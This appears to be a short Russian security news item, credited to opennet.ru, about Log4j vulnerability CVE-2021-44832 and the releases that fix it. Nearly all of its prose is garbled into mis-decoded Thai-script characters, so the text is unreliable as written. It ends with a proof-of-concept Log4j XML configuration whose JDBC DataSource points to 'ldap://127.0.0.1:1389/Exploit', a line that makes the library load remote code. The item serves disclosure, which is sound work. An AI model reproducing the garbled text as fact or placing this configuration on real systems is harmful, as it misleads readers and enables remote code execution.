ะะฟัะฑะปะธะบะพะฒะฐะฝั ะบะพััะตะบัะธััััะธะต ะฒัะฟััะบะธ ะฑะธะฑะปะธะพัะตะบะธ Log4j 2.17.1, 2.3.2-rc1 ะธ 2.12.4-rc1, ะฒ ะบะพัะพััั ััััะฐะฝะตะฝะฐ ะตัั ะพะดะฝะฐ ััะทะฒะธะผะพััั (CVE-2021-44832). ะฃะฟะพะผะธะฝะฐะตััั, ััะพ ะฟัะพะฑะปะตะผะฐ ะฟะพะทะฒะพะปัะตั ะพัะณะฐะฝะธะทะพะฒะฐัั ัะดะฐะปัะฝะฝะพะต ะฒัะฟะพะปะฝะตะฝะธะต ะบะพะดะฐ (RCE), ะฝะพ ะฟัะธ ััะพะผ ะฟะพะผะตัะตะฝะฐ ะบะฐะบ ะฝะตะพะฟะฐัะฝะฐั (CVSS Score 6.6) ะธ ะฒ ะพัะฝะพะฒะฝะพะผ ะฟัะตะดััะฐะฒะปัะตั ะปะธัั ัะตะพัะตัะธัะตัะบะธะน ะธะฝัะตัะตั, ัะฐะบ ะบะฐะบ ััะตะฑัะตั ัะฟะตัะธัะธัะฝัั ััะปะพะฒะธะน ะดะปั ัะบัะฟะปัะฐัะฐัะธะธ โ ะฐัะฐะบัััะธะน ะดะพะปะถะตะฝ ะธะผะตัั ะฒะพะทะผะพะถะฝะพััั ะฒะฝะตััะธ ะธะทะผะตะฝะตะฝะธะต ะฒ ัะฐะนะป ั ะฝะฐัััะพะนะบะฐะผะธ Log4j, ั.ะต. ะดะพะปะถะตะฝ ะธะผะตัั ะดะพัััะฟ ะบ ะฐัะฐะบัะตะผะพะน ัะธััะตะผะต ะธ ะฟะพะปะฝะพะผะพัะธั ะธะทะผะตะฝััั ะทะฝะฐัะตะฝะธะต ะฟะฐัะฐะผะตััะฐ ะบะพะฝัะธะณััะฐัะธะธ log4j2.configurationFile ะธะปะธ ะฒะฝะพัะธัั ะธะทะผะตะฝะตะฝะธั ะฒ ัััะตััะฒัััะธะต ัะฐะนะปั c ะฝะฐัััะพะนะบะฐะผะธ ะดะปั ะฒะตะดะตะฝะธั ะปะพะณะฐ.
ะัะฐะบะฐ ัะฒะพะดะธััั ะบ ะพะฟัะตะดะตะปะตะฝะธั ะฝะฐ ะปะพะบะฐะปัะฝะพะน ัะธััะตะผะต ะบะพะฝัะธะณััะฐัะธะธ ะฝะฐ ะฑะฐะทะต JDBC Appender, ัััะปะฐััะตะนัั ะฝะฐ ะฒะฝะตัะฝะธะน JNDI URI, ะฟัะธ ะทะฐะฟัะพัะต ะบะพัะพัะพะณะพ ะผะพะถะตั ะฑััั ะฒะพะทะฒัะฐััะฝ Java-ะบะปะฐัั ะดะปั ะธัะฟะพะปะฝะตะฝะธั. ะะพ ัะผะพะปัะฐะฝะธั JDBC Appender ะฝะต ะฝะฐัััะพะตะฝ ะดะปั ะพะฑัะฐะฑะพัะบะธ ะฟัะพัะพะบะพะปะพะฒ, ะพัะปะธัะฝัั
ะพั Java, ั.ะต. ะฑะตะท ะธะทะผะตะฝะตะฝะธั ะบะพะฝัะธะณััะฐัะธะธ ะฐัะฐะบะฐ ะฝะตะฒะพะทะผะพะถะฝะฐ. ะัะพะผะต ัะพะณะพ, ะฟัะพะฑะปะตะผะฐ ะฟัะพัะฒะปัะตััั ัะพะปัะบะพ ะฒ JAR-ัะฐะนะปะต log4j-core ะธ ะฝะต ะทะฐััะฐะณะธะฒะฐะตั ะฟัะธะปะพะถะตะฝะธั, ะธัะฟะพะปัะทัััะธะต JAR-ัะฐะนะป log4j-api ะฑะตะท log4j-core. <Appenders> <JDBC name=ยปdatabaseAppenderยป tableName=ยปdbo.application_logยป> <DataSource jndiName=ยปldap://127.0.0.1:1389/Exploitยป/> โฆ </JDBC> </Appenders>
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru